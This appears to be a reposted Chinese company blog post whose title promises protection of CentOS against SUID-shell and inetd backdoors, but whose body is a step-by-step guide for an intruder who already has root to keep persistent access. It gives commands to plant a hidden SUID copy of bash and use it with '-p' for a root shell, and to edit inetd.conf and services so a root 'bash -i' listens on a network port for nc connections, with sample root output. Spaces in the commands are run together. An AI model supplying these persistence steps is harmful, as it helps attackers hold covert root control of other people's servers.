本篇內(nèi)容主要講解“如何防止CentOS被suid shell與inetd后門利用”,感興趣的朋友不妨來看看。本文介紹的方法操作簡單快捷,實用性強(qiáng)。下面就讓小編來帶大家學(xué)習(xí)“如何防止CentOS被suid shell與inetd后門利用”吧!
成都網(wǎng)站建設(shè)、成都網(wǎng)站制作的開發(fā),更需要了解用戶,從用戶角度來建設(shè)網(wǎng)站,獲得較好的用戶體驗。成都創(chuàng)新互聯(lián)公司多年互聯(lián)網(wǎng)經(jīng)驗,見的多,溝通容易、能幫助客戶提出的運營建議。作為成都一家網(wǎng)絡(luò)公司,打造的就是網(wǎng)站建設(shè)產(chǎn)品直銷的概念。選擇成都創(chuàng)新互聯(lián)公司,不只是建站,我們把建站作為產(chǎn)品,不斷的更新、完善,讓每位來訪用戶感受到浩方產(chǎn)品的價值服務(wù)。你現(xiàn)在已經(jīng)是root用戶,想留一個后門。
系統(tǒng)環(huán)境:
dawg:~#uname-a
Linuxdawg2.4.20-1-386#3SatMar2212:11:40EST2003i686GNU/Linux
1.SUIDshell
首先,先切換成為root用戶,并執(zhí)行以下的命令:
dawg:~#cp/bin/bash/.wootdawg:~#chmod4755/.wootdawg:~#ls-al/.woot-rwsr-xr-x1rootroot690668Jul2417:14/.woot
當(dāng)然,你也可以起其他更具備隱藏性的名字,我想猥瑣并機(jī)智的你,肯定能想出很多好的名字的。文件前面的那一點也不是必要的,只是為了隱藏文件(在文件名的最前面加上“.”,就可以在任意文件目錄下進(jìn)行隱藏).
現(xiàn)在,做為一個普通用戶,我們來啟用這個后門:
fw@dawg:~$iduid=1000(fw)gid=1000(fw)groups=1000(fw)fw@dawg:~$/.woot.woot-2.05b$iduid=1000(fw)gid=1000(fw)groups=1000(fw).woot-2.05b$
為什么不行呢?
因為bash3針對suid有一些護(hù)衛(wèi)的措施.但這也不是不可破的:
.woot-2.05b$/.woot-p
.woot-2.05b#id
uid=1000(fw)gid=1000(fw)euid=0(root)groups=1000(fw)
使用-p參數(shù)來獲取一個rootshell.這個euid的意思是effectiveuserid(關(guān)于這些ID的知識,可以戳這里)
這里要特別注意的是,作為一個普通用戶執(zhí)行這個SUIDshell時,一定要使用全路徑。
小知識:
如何查找那些具有SUID的文件:
dawg:~#find/-perm+4000-ls
這時就會返回具有SUID位的文件啦。
2.遠(yuǎn)程后門:利用/etc/inetd.conf
我們使用vi來修改/etc/inetd.conf文件
原文件:
#chargendgramudpwaitrootinternal
#discardstreamtcpnowaitrootinternal
#discarddgramudpwaitrootinternal
#daytimestreamtcpnowaitrootinternal
修改為:
#discardstreamtcpnowaitrootinternal
#discarddgramudpwaitrootinternal
daytimestreamtcpnowaitroot/bin/bashbash-i
開啟inetd:
dawg:~#inetd
如果要強(qiáng)制重啟inetd:
dawg:~#ps-ef|grepinetdroot36210Jul22?00:00:00/usr/sbin/inetdroot1376913643017:51pts/100:00:00grepinetddawg:~#kill-HUP362
現(xiàn)在我們就可以用nc來爆菊了:
C:tools192.168.1.77:inversehostlookupfailed:h_errno11004:NO_DATA
(UNKNOWN)[192.168.1.77]13(daytime)open
bash:nojobcontrolinthisshell
bash-2.05b#bash-2.05b#
bash-2.05b#iduid=0(root)
gid=0(root)groups=0(root)bash-2.05b#uname-a
Linuxdawg2.4.20-1-386#3SatMar2212:11:40EST2003i686GNU/Linux
小貼士:
我們可以修改/etc/services文件,加入以下的東西:
woot6666/tcp#evilbackdoorservice
然后修改/etc/inetd.conf:
wootstreamtcpnowaitroot/bin/bashbash-i
我們可以修改成一些常見的端口,以實現(xiàn)隱藏。
到此,相信大家對“如何防止CentOS被suid shell與inetd后門利用”有了更深的了解,不妨來實際操作一番吧!這里是創(chuàng)新互聯(lián)建站,更多相關(guān)內(nèi)容可以進(jìn)入相關(guān)頻道進(jìn)行查詢,關(guān)注我們,繼續(xù)學(xué)習(xí)!
文章名稱:如何防止CentOS被suidshell與inetd后門利用-創(chuàng)新互聯(lián)
網(wǎng)站地址:http://jinyejixie.com/article42/djeeec.html
成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供網(wǎng)站建設(shè)、Google、網(wǎng)站改版、移動網(wǎng)站建設(shè)、建站公司、網(wǎng)站導(dǎo)航
聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請盡快告知,我們將會在第一時間刪除。文章觀點不代表本網(wǎng)站立場,如需處理請聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時需注明來源: 創(chuàng)新互聯(lián)
猜你還喜歡下面的內(nèi)容